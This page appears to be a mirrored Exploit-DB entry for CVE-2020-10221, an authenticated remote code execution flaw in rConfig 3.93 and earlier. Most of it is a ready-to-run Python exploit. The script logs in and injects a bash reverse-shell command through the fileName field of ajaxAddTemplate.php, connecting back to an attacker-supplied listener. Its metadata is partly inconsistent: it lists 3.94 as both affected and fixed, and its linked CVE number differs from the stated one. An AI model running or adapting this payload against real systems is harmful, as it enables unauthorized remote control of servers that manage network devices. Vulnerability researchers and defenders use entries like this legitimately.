header-logo
Suggest Exploit
vendor:
rConfig
by:
Engin Demirbilek
8.8
CVSS
HIGH
Authenticated Remote Code Execution
78
CWE
Product Name: rConfig
Affected Version From: rConfig <= 3.94
Affected Version To: rConfig <= 3.94
Patch Exists: YES
Related CWE: CVE-2020-10221
CPE: a:rconfig:rconfig
Metasploit: https://www.rapid7.com/db/vulnerabilities/alma_linux-cve-2019-10221/
Other Scripts: N/A
Platforms Tested: centOS
2020

rConfig 3.93 – ‘ajaxAddTemplate.php’ Authenticated Remote Code Execution

An authenticated remote code execution vulnerability exists in rConfig 3.93 and below. An attacker can exploit this vulnerability by sending a malicious payload to the ajaxAddTemplate.php file. This will allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to rConfig 3.94 or later.
Source

Exploit-DB raw data:

# Exploit Title: rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution
# Date: 2020-03-08
# Exploit Author: Engin Demirbilek
# Vendor Homepage: https://www.rconfig.com/
# Version: rConfig <= 3.94
# Tested on: centOS
# CVE: CVE-2020-10221
# Advisory link: https://engindemirbilek.github.io/rconfig-3.93-rce

import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
if len(sys.argv) < 6:
	print "Usage: ./exploit.py http(s)://url username password listenerIP listenerPort"
	exit()

url = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
payload = ";bash -i >& /dev/tcp/{}/{} 0>&1;".format(sys.argv[4], sys.argv[5])

login = {
	'user':user,
	'pass':password,
	'sublogin':'1'
}
req = requests.Session()
print "Sendin login request ..."
login = req.post(url+"/lib/crud/userprocess.php", data=login, verify=False)

payload = {
	'fileName':payload,
}



print "[+] Sendin exploit ..."

exploit = req.post(url+"/lib/ajaxHandlers/ajaxAddTemplate.php",cookies=req.cookies, data=payload, headers={
'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Encoding':'gzip, deflate',
'Content-Type':'application/x-www-form-urlencoded'},verify=False)

if exploit.status_code == 200:
	print "[+] Everything seems ok, check your listener."
else:
	print "[-] Exploit failed,  system is patched or credentials are wrong."

Navigation

Suggest Exploit

Services By CQR